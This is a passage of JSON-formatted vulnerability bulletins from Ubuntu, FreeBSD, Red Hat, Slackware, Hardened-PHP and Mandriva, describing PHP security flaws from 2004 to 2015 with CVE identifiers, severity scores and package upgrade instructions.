(CVE-2015-1352)", "modified": "2015-02-17T00:00:00", "published": "2015-02-17T00:00:00", "id": "USN-2501-1", "href": "https://usn.ubuntu.com/2501-1/", "title": "PHP vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:16:05", "bulletinFamily": "unix", "description": "\nSecunia reports:\n\nMultiple vulnerabilities have been reported in PHP,\n\t which can be exploited to gain escalated privileges,\n\t bypass certain security restrictions, gain knowledge\n\t of sensitive information, or compromise a vulnerable\n\t system.\n\n", "modified": "2004-12-18T00:00:00", "published": "2004-12-16T00:00:00", "id": "D47E9D19-5016-11D9-9B5F-0050569F0001", "href": "https://vuxml.freebsd.org/freebsd/d47e9d19-5016-11d9-9b5f-0050569f0001.html", "title": "php -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T17:44:57", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA double-free bug was found in the deserialization code of PHP. PHP\napplications use the unserialize function on untrusted user data, which\ncould allow a remote attacker to gain access to memory or potentially\nexecute arbitrary code. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2004-1019 to this issue.\n\nFlaws were found in the pack and unpack PHP functions. These functions\ndo not normally pass user supplied data, so they would require a malicious\nPHP script to be exploited. 
The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CAN-2004-1018 to this issue.\n\nA bug was discovered in the initialization of the OpenSSL library, such\nthat the curl extension could not be used to perform HTTP requests over SSL\nunless the php-imap package was installed.\n\nUsers of PHP should upgrade to these updated packages, which contain fixes\nfor these issues.", "modified": "2018-03-14T19:28:10", "published": "2005-01-19T05:00:00", "id": "RHSA-2005:031", "href": "https://access.redhat.com/errata/RHSA-2005:031", "type": "redhat", "title": "(RHSA-2005:031) php security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:42:04", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nFlaws including possible information disclosure, double free, and negative\nreference index array underflow were found in the deserialization code of\nPHP. PHP applications may use the unserialize function on untrusted user\ndata, which could allow a remote attacker to gain access to memory or\npotentially execute arbitrary code. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-1019 to\nthis issue.\n\nA flaw in the exif extension of PHP was found which lead to a stack\noverflow. An attacker could create a carefully crafted image file in such\na way which, if parsed by a PHP script using the exif extension, could\ncause a crash or potentially execute arbitrary code. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2004-1065 to this issue.\n\nFlaws were found in shmop_write, pack, and unpack PHP functions. These\nfunctions are not normally passed user supplied data, so would require a\nmalicious PHP script to be exploited. 
The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-1018 to\nthis issue.\n\nUsers of PHP should upgrade to these updated packages, which contain fixes\nfor these issues.", "modified": "2017-09-08T11:51:21", "published": "2005-02-15T05:00:00", "id": "RHSA-2005:032", "href": "https://access.redhat.com/errata/RHSA-2005:032", "type": "redhat", "title": "(RHSA-2005:032) php security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:43:55", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nFlaws including possible information disclosure, double free, and negative\nreference index array underflow were found in the deserialization code of\nPHP. PHP applications may use the unserialize function on untrusted user\ndata, which could allow a remote attacker to gain access to memory or\npotentially execute arbitrary code. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-1019 to\nthis issue.\n\nA flaw in the exif extension of PHP was found which lead to a stack\noverflow. An attacker could create a carefully crafted image file in such\na way that if parsed by a PHP script using the exif extension it could\ncause a crash or potentially execute arbitrary code. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2004-1065 to this issue.\n\nAn information disclosure bug was discovered in the parsing of \"GPC\"\nvariables in PHP (query strings or cookies, and POST form data). If\nparticular scripts used the values of the GPC variables, portions of the\nmemory space of an httpd child process could be revealed to the client. 
\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CAN-2004-0958 to this issue.\n\nA file access bug was discovered in the parsing of \"multipart/form-data\"\nforms, used by PHP scripts which allow file uploads. In particular\nconfigurations, some scripts could allow a malicious client to upload files\nto an arbitrary directory where the \"apache\" user has write access. The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has assigned\nthe name CAN-2004-0959 to this issue.\n\nFlaws were found in shmop_write, pack, and unpack PHP functions. These\nfunctions are not normally passed user supplied data, so would require a\nmalicious PHP script to be exploited. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-1018 to\nthis issue.\n\nVarious issues were discovered in the use of the \"select\" system call in\nPHP, which could be triggered if PHP is used in an Apache configuration\nwhere the number of open files (such as virtual host log files) exceeds the\ndefault process limit of 1024. Workarounds are now included for some of\nthese issues.\n\nThe \"phpize\" shell script included in PHP can be used to build third-party\nextension modules. A build issue was discovered in the \"phpize\" script on\nsome 64-bit platforms which prevented correct operation.\n\nThe \"pcntl\" extension module is now enabled in the command line PHP\ninterpreter, /usr/bin/php. 
This module enables process control features \nsuch as \"fork\" and \"kill\" from PHP scripts.\n\nUsers of PHP should upgrade to these updated packages, which contain fixes\nfor these issues.", "modified": "2017-07-29T20:27:18", "published": "2004-12-21T05:00:00", "id": "RHSA-2004:687", "href": "https://access.redhat.com/errata/RHSA-2004:687", "type": "redhat", "title": "(RHSA-2004:687) php security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:45:44", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA flaw was found in the way PHP registers global variables during a file\r\nupload request. A remote attacker could submit a carefully crafted\r\nmultipart/form-data POST request that would overwrite the $GLOBALS array,\r\naltering expected script behavior, and possibly leading to the execution of\r\narbitrary PHP commands. Note that this vulnerability only affects\r\ninstallations which have register_globals enabled in the PHP configuration\r\nfile, which is not a default or recommended option. The Common\r\nVulnerabilities and Exposures project assigned the name CVE-2005-3390 to\r\nthis issue.\r\n\r\nA flaw was found in the PHP parse_str() function. If a PHP script passes\r\nonly one argument to the parse_str() function, and the script can be forced\r\nto abort execution during operation (for example due to the memory_limit\r\nsetting), the register_globals may be enabled even if it is disabled in the\r\nPHP configuration file. This vulnerability only affects installations that\r\nhave PHP scripts using the parse_str function in this way. (CVE-2005-3389)\r\n\r\nA Cross-Site Scripting flaw was found in the phpinfo() function. 
If a\r\nvictim can be tricked into following a malicious URL to a site with a page\r\ndisplaying the phpinfo() output, it may be possible to inject javascript\r\nor HTML content into the displayed page or steal data such as cookies. \r\nThis vulnerability only affects installations which allow users to view the\r\noutput of the phpinfo() function. As the phpinfo() function outputs a\r\nlarge amount of information about the current state of PHP, it should only\r\nbe used during debugging or if protected by authentication. (CVE-2005-3388)\r\n\r\nAdditionally, a bug introduced in the updates to fix CVE-2004-1019 has been\r\ncorrected.\r\n\r\nUsers of PHP should upgrade to these updated packages, which contain\r\nbackported patches that resolve these issues.", "modified": "2018-03-14T19:26:00", "published": "2005-11-10T05:00:00", "id": "RHSA-2005:838", "href": "https://access.redhat.com/errata/RHSA-2005:838", "type": "redhat", "title": "(RHSA-2005:838) php security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T21:42:31", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server. The php55 packages provide a recent stable release of PHP with\nthe PEAR 1.9.4, memcache 3.0.8, and mongo 1.4.5 PECL extensions, and a\nnumber of additional utilities.\n\nThe php55 packages have been upgraded to upstream version 5.5.21, which\nprovides multiple bug fixes over the version shipped in Red Hat Software\nCollections 1. (BZ#1057089)\n\nThe following security issues were fixed in the php55-php component:\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. 
A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA heap buffer overflow flaw was found in PHP's regular expression\nextension. An attacker able to make PHP process a specially crafted regular\nexpression pattern could cause it to crash and possibly execute arbitrary\ncode. (CVE-2015-2305)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nA use-after-free flaw was found in PHP's OPcache extension. This flaw could\npossibly lead to a disclosure of a portion of the server memory.\n(CVE-2015-1351)\n\nA use-after-free flaw was found in PHP's phar (PHP Archive) extension.\nAn attacker able to trigger a certain error condition in phar archive\nprocessing could possibly use this flaw to disclose certain portions of\nserver memory. (CVE-2015-2301)\n\nAn out-of-bounds read flaw was found in the way the File Information\n(fileinfo) extension processed certain Pascal strings. A remote attacker\ncould cause a PHP application to crash if it used fileinfo to identify the\ntype of the attacker-supplied file. 
(CVE-2014-9652)\n\nIt was found that PHP move_uploaded_file() function did not properly handle\nfile names with a NULL character. A remote attacker could possibly use this\nflaw to make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348)\n\nA NULL pointer dereference flaw was found in PHP's pgsql extension. A\nspecially crafted table name passed to a function such as pg_insert() or\npg_select() could cause a PHP application to crash. (CVE-2015-1352)\n\nA flaw was found in the way PHP handled malformed source files when running\nin CGI mode. A specially crafted PHP file could cause PHP CGI to crash.\n(CVE-2014-9427)\n\nAll php55 users are advised to upgrade to these updated packages, which\ncorrect these issues. After installing the updated packages, the\nhttpd24-httpd service must be restarted for the update to take effect.\n", "modified": "2018-06-13T01:28:18", "published": "2015-06-04T04:00:00", "id": "RHSA-2015:1053", "href": "https://access.redhat.com/errata/RHSA-2015:1053", "type": "redhat", "title": "(RHSA-2015:1053) Moderate: php55 security and bug fix update", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-12-11T19:43:26", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server. The php54 packages provide a recent stable release of PHP with\nthe PEAR 1.9.4, APC 3.1.15, and memcache 3.0.8 PECL extensions, and a\nnumber of additional utilities.\n\nThe php54 packages have been upgraded to upstream version 5.4.40, which\nprovides a number of bug fixes over the version shipped in Red Hat Software\nCollections 1. (BZ#1168193)\n\nThe following security issues were fixed in the php54-php component:\n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. 
A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148)\n\nMultiple flaws were found in the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2783,\nCVE-2015-3307, CVE-2015-3329)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA heap buffer overflow flaw was found in PHP's regular expression\nextension. An attacker able to make PHP process a specially crafted regular\nexpression pattern could cause it to crash and possibly execute arbitrary\ncode. (CVE-2015-2305)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nA use-after-free flaw was found in PHP's phar (PHP Archive) extension.\nAn attacker able to trigger a certain error condition in phar archive\nprocessing could possibly use this flaw to disclose certain portions of\nserver memory. 
(CVE-2015-2301)\n\nAn out-of-bounds read flaw was found in the way the File Information\n(fileinfo) extension processed certain Pascal strings. A remote attacker\ncould cause a PHP application to crash if it used fileinfo to identify the\ntype of the attacker-supplied file. (CVE-2014-9652)\n\nIt was found that PHP move_uploaded_file() function did not properly handle\nfile names with a NULL character. A remote attacker could possibly use this\nflaw to make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348)\n\nA flaw was found in the way PHP handled malformed source files when running\nin CGI mode. A specially crafted PHP file could cause PHP CGI to crash.\n(CVE-2014-9427)\n\nThe following security issue was fixed in the php54-php-pecl-zendopcache\ncomponent:\n\nA use-after-free flaw was found in PHP's OPcache extension. This flaw could\npossibly lead to a disclosure of a portion of the server memory.\n(CVE-2015-1351)\n\nAll php54 users are advised to upgrade to these updated packages, which\ncorrect these issues. After installing the updated packages, the httpd\nservice must be restarted for the update to take effect.\n", "modified": "2018-06-13T01:28:17", "published": "2015-06-04T04:00:00", "id": "RHSA-2015:1066", "href": "https://access.redhat.com/errata/RHSA-2015:1066", "type": "redhat", "title": "(RHSA-2015:1066) Important: php54 security and bug fix update", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-12-11T17:41:45", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. 
(CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600,\nCVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026,\nCVE-2015-3411, CVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP's File Information (fileinfo) extension.\nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. 
(CVE-2014-9652,\nCVE-2015-4604, CVE-2015-4605)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nThis update also fixes the following bugs:\n\n* The libgmp library in some cases terminated unexpectedly with a\nsegmentation fault when being used with other libraries that use the GMP\nmemory management. With this update, PHP no longer changes libgmp memory\nallocators, which prevents the described crash from occurring. (BZ#1212305)\n\n* When using the Open Database Connectivity (ODBC) API, the PHP process\nin some cases terminated unexpectedly with a segmentation fault. The\nunderlying code has been adjusted to prevent this crash. (BZ#1212299)\n\n* Previously, running PHP on a big-endian system sometimes led to memory\ncorruption in the fileinfo module. This update adjusts the behavior of\nthe PHP pointer so that it can be freed without causing memory corruption.\n(BZ#1212298)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\n", "modified": "2018-04-12T03:33:12", "published": "2015-06-23T04:00:00", "id": "RHSA-2015:1135", "href": "https://access.redhat.com/errata/RHSA-2015:1135", "type": "redhat", "title": "(RHSA-2015:1135) Important: php security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:56", "bulletinFamily": "software", "description": "\r\n\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[slackware-security] php (SSA:2014-356-02)\r\n\r\nNew php packages are available for Slackware 14.0, 14.1, and -current to\r\nfix security issues.\r\n\r\n\r\nHere are the details from the Slackware 14.1 ChangeLog:\r\n+--------------------------+\r\npatches/packages/php-5.4.36-i486-1_slack14.1.txz: Upgraded.\r\n This update fixes bugs and security issues.\r\n #68545 (NULL pointer dereference in unserialize.c).\r\n #68594 (Use after free vulnerability in unserialize()). (CVE-2014-8142)\r\n #68283 (fileinfo: out-of-bounds read in elf note headers). (CVE-2014-3710)\r\n For more information, see:\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3710\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142\r\n (* Security fix *)\r\n+--------------------------+\r\n\r\n\r\nWhere to find the new packages:\r\n+-----------------------------+\r\n\r\nThanks to the friendly folks at the OSU Open Source Lab\r\n(http://osuosl.org) for donating FTP and rsync hosting\r\nto the Slackware project! 
\r\n\r\nAlso see the \"Get Slack\" section on http://slackware.com for\r\nadditional mirror sites near you.\r\n\r\nUpdated package for Slackware 14.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.36-i486-1_slack14.0.txz\r\n\r\nUpdated package for Slackware x86_64 14.0:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.36-x86_64-1_slack14.0.txz\r\n\r\nUpdated package for Slackware 14.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.36-i486-1_slack14.1.txz\r\n\r\nUpdated package for Slackware x86_64 14.1:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.36-x86_64-1_slack14.1.txz\r\n\r\nUpdated package for Slackware -current:\r\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.4.36-i486-1.txz\r\n\r\nUpdated package for Slackware x86_64 -current:\r\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.4.36-x86_64-1.txz\r\n\r\n\r\nMD5 signatures:\r\n+-------------+\r\n\r\nSlackware 14.0 package:\r\nd25a3e243ec1921b7ac321be40336251 php-5.4.36-i486-1_slack14.0.txz\r\n\r\nSlackware x86_64 14.0 package:\r\nc374f5fef8a922ee1718232be4baefbf php-5.4.36-x86_64-1_slack14.0.txz\r\n\r\nSlackware 14.1 package:\r\n365000d20e974b045b2acc143ba6dfbe php-5.4.36-i486-1_slack14.1.txz\r\n\r\nSlackware x86_64 14.1 package:\r\n81fc269537befcc2fcb3be913588d8cc php-5.4.36-x86_64-1_slack14.1.txz\r\n\r\nSlackware -current package:\r\nbce0dc50b1430ed7a521b07795763922 n/php-5.4.36-i486-1.txz\r\n\r\nSlackware x86_64 -current package:\r\n6266e021adac91c16e68e61ee4bcdf9b n/php-5.4.36-x86_64-1.txz\r\n\r\n\r\nInstallation instructions:\r\n+------------------------+\r\n\r\nUpgrade the package as root:\r\n# upgradepkg php-5.4.36-i486-1_slack14.1.txz\r\n\r\nThen, restart Apache httpd:\r\n# /etc/rc.d/rc.httpd stop\r\n# /etc/rc.d/rc.httpd start\r\n\r\n\r\n+-----+\r\n\r\nSlackware Linux Security 
Team\r\nhttp://slackware.com/gpg-key\r\nsecurity@slackware.com\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niEYEARECAAYFAlSY3jkACgkQakRjwEAQIjMkjQCfRjzllMps/dUb1k5GlvLY2GIS\r\ntwMAoJK0hs2pJ20qtJjlbTmdsWwWgu+W\r\n=nLns\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-12-23T00:00:00", "published": "2014-12-23T00:00:00", "id": "SECURITYVULNS:DOC:31552", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31552", "title": "[slackware-security] php (SSA:2014-356-02)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Hardened-PHP Project\r\n www.hardened-php.net\r\n\r\n -= Security Advisory =-\r\n\r\n\r\n\r\n Advisory: Multiple vulnerabilities within PHP 4/5\r\n Release Date: 2004/12/15\r\nLast Modified: 2004/12/15\r\n Author: Stefan Esser [sesser@php.net]\r\n\r\n Application: PHP4 <= 4.3.9\r\n PHP5 <= 5.0.2\r\n Severity: Several vulnerabilities within PHP allow \r\n local and remote execution of arbitrary code\r\n Risk: Critical\r\nVendor Status: Vendor has released bugfixed versions.\r\n References: http://www.hardened-php.net/advisories/012004.txt\r\n\r\n\r\nOverview:\r\n\r\n PHP is a widely-used general-purpose scripting language that is \r\n 
especially suited for Web development and can be embedded into HTML.\r\n\r\n During the development of Hardened-PHP which adds security hardening\r\n features to the PHP codebase, several vulnerabilities within PHP \r\n were discovered that reach from buffer overflows, over information \r\n leak vulnerabilities and path truncation vulnerabilities to\r\n safe_mode restriction bypass vulnerabilities.\r\n \r\n\r\nDetails:\r\n\r\n [01 - pack() - integer overflow leading to heap buffer overflow ]\r\n \r\n Insufficient validation of the parameters passed to pack() can\r\n lead to a heap overflow which can be used to execute arbitrary\r\n code from within a PHP script. This enables an attacker to\r\n bypass safe_mode restrictions and execute arbitrary code with\r\n the permissions of the webserver. Due to the nature of this\r\n function it is unlikely that a script accidentally exposes it to\r\n remote attackers.\r\n \r\n [02 - unpack() - integer overflow leading to heap info leak ]\r\n\r\n Insufficient validation of the parameters passed to unpack() can\r\n lead to a heap information leak which can be used to retrieve\r\n secret data from the apache process. Additionally a skilled\r\n local attacker could use this vulnerability in combination with\r\n 01 to bypass heap canary protection systems. Similar to 01 this\r\n function is usually not used on user supplied data within\r\n web applications.\r\n\r\n [03 - safe_mode_exec_dir bypass in multithreaded PHP ]\r\n \r\n When safe_mode is activated within PHP, it is only allowed to\r\n execute commands within the configured safe_mode_exec_dir. \r\n Unfortunately PHP does prepend a \"cd [currentdir] ;\" to any\r\n executed command when a PHP is running on a multithreaded unix\r\n webserver (f.e. some installations of Apache2). 
Because the name\r\n of the current directory is prepended directly a local attacker\r\n may bypass safe_mode_exec_dir restrictions by injecting shell-\r\n commands into the current directory name.\r\n \r\n [04 - safe_mode bypass through path truncation ]\r\n \r\n The safe_mode checks silently truncated the file path at MAXPATHLEN\r\n bytes before passing it to realpath(). In combination with certain\r\n malfunctional implementations of realpath() f.e. within glibc this\r\n allows crafting a filepath that passes the safe_mode check although\r\n it points to a file that should fail the safe_mode check.\r\n \r\n [05 - path truncation in realpath() ]\r\n \r\n PHP uses realpath() within several places to get the real path\r\n of files. Unfortunately some implementations of realpath() silently\r\n truncate overlong filenames (f.e. OpenBSD, and older NetBSD/FreeBSD)\r\n This can lead to arbitrary file include vulnerabilities if something\r\n like \"include \"modules/$userinput/config.inc.php\"; is used on such\r\n systems.\r\n \r\n [06 - unserialize() - wrong handling of negative references ]\r\n \r\n The variable unserializer could be fooled with negative references\r\n to add false zvalues to hashtables. When those hashtables get\r\n destroyed this can lead to efree()s of arbitrary memory addresses\r\n which can result in arbitrary code execution. (Unless Hardened-PHP's\r\n memory manager canaries are activated)\r\n \r\n [07 - unserialize() - wrong handling of references to freed data ]\r\n \r\n Additionally to bug 07 the previous version of the variable \r\n unserializer allowed setting references to already freed entries in\r\n the variable hash. A skilled attacker can exploit this to create \r\n a universal string that will pass execution to an arbitrary \r\n memory address when it is passed to unserialize(). 
For AMD64 systems\r\n a string was developed that directly passes execution to code \r\n contained in the string itself.\r\n \r\n It is necessary to understand that these strings can exploit a \r\n bunch of popular PHP applications remotely because they pass f.e.\r\n cookie content to unserialize().\r\n \r\n Examples of vulnerable scripts:\r\n \r\n - phpBB2\r\n - Invision Board\r\n - vBulletin\r\n - Woltlab Burning Board 2.x\r\n - Serendipity Weblog\r\n - phpAds(New)\r\n - ...\r\n\r\n\r\nProof of Concept:\r\n\r\n The Hardened-PHP project is not going to release exploits for any \r\n of these vulnerabilities to the public.\r\n\r\n\r\nCVE Information:\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\n assigned the name CAN-2004-1018 to issues 01, 02, the name \r\n CAN-2004-1019 to issues 06, 07, the name CAN-2004-1063 to issue 03\r\n and the name CAN-2004-1064 to issues 04, 05.\r\n\r\n\r\nRecommendation:\r\n\r\n It is strongly recommended to upgrade to the new PHP-Releases as\r\n soon as possible, because a lot of PHP applications expose the\r\n easy to exploit unserialize() vulnerability to remote attackers.\r\n Additionally we always recommend to run PHP with the Hardened-PHP\r\n patch applied.\r\n \r\n\r\nGPG-Key:\r\n\r\n http://www.hardened-php.net/hardened-php-signature-key.asc\r\n\r\n pub 1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key\r\n Key fingerprint = 066F A6D0 E57E 9936 9082 7E52 4439 14CC 0A86 4AA1\r\n\r\n\r\nCopyright 2004 Stefan Esser. 
All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.6 (GNU/Linux)\r\nComment: For info see http://www.gnupg.org\r\n\r\niD8DBQFBwDo7RDkUzAqGSqERAgVxAKC0LnTE49y5HFjeXpwXrZmAjuCL8gCgpQUl\r\nrtmmBfJ3iv9Ksb/xtnyflD0=\r\n=lzXX\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2004-12-16T00:00:00", "published": "2004-12-16T00:00:00", "id": "SECURITYVULNS:DOC:7349", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7349", "title": "Advisory 01/2004: Multiple vulnerabilities in PHP 4/5", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:57", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2015:032\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : php\r\n Date : February 5, 2015\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities have been discovered and corrected in php:\r\n \r\n sapi/cgi/cgi_main.c in the CGI component in PHP through 5.4.36, 5.5.x\r\n through 5.5.20, and 5.6.x through 5.6.4, when mmap is used to read\r\n a .php file, does not properly consider the mapping's length during\r\n processing of an invalid file that begins with a # character and lacks\r\n a newline character, which causes an out-of-bounds read and might (1)\r\n allow remote attackers to obtain sensitive information from php-cgi\r\n process memory by leveraging the ability to upload a .php file or (2)\r\n trigger unexpected code execution if a valid PHP script is present\r\n in memory locations adjacent to the mapping (CVE-2014-9427).\r\n \r\n Use-after-free 
